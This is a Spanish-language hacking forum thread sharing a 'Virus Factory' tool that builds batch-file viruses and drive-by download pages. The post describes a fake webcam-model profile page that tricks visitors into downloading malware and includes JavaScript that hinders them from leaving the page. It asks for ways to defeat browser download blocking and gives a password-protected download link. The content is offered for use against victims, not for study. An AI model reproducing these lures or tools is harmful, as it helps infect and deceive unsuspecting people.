• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Virus Factory

Status
Not open for further replies.

0b3y

☢AutoIt c0d3r☢
User
Reaction score
570
Credits
0
‎12 Years of Service‎
73%
Hola hermanos hoy quería compartir con vosotros esta herramienta que a mi me costo bastante encontrar y que esta bastante bien.

image.php

Consta de 3 partes:

1. Batch Virus Factory: Solo tienes que seleccionar la opción que quieras para que el virus haga y te lo incorporará al cuerpo del virus el solo.

image.php

A parte de tener gran cantidad de opciones puedes "personalizar" algunas de ellas:

image.php

2. Drive-by Factory:
    image.php

Esta en concreto me encanta, lo que hace es crear una pagina web simulando ser el perfil de una mujer que tiene una web-cam y te pide que descarges el "Software" para poder verla, se puede modificar la imagen el texto... como quieras.

Quedaría asi:
    image.php

Esta es la mia subida a un hosting, solo tienen que difundir el enlace:

image.php

Les recomindo que si saben javascript lo usen para que sea más dificil salir de la página, por ejemplo con este code:
    Code:
    >var areYouReallySure = false;

var internalLink = false;

function areYouSure() {

if (!areYouReallySure && !internalLink) {

areYouReallySure = true;

location.href=""

return 'See this model for FREE\n\nSure you dont want to wach her?\n\nClick in cancel to continue in the page!\n\n';

}

}

window.onbeforeunload = areYouSure;

image.php

que sirve para cuando le den a cerrar salte una ventana para asegurar, se que hay uno que es un loop infinito del que es muy dificil salir pero no se como es. En JavaScript ya tiene un codigo para que al abrir la pagina el programa se descargue solo, pero lo malo es que los navegadores lo bloquean asique la victima tiene que clikcar en el enlace que hay debajo de la imagen en blanco, si saben algun metodo para que los navegadores no impidanla descarga avisen!!
  3. Icon/pump Factory: Bueno esta opción no hace mucho, solo usa el reshacker para cambiar el icono a un archivo

image.php

Espero que sea de su agrado y no la lien mucho con este programa!

Aviso: El batch que genera se hizo para win XP asique hay funciones que en una versión mas avanzada no funciona

Download:

Code:
>http://www.mediafire.com/?erjdi1r65v6vp3k
Pass:

Code:
>level-23

Last edited by a moderator:
Please note, if you want to make a deal with this user, that it is blocked.
Re: Virus Factory

lo mando a zona de analisis si esta limpio lo pongo en su lugar

Re: Virus Factory

Hello I am a novise and I find no host. can you give me a web host?

Status
Not open for further replies.
Back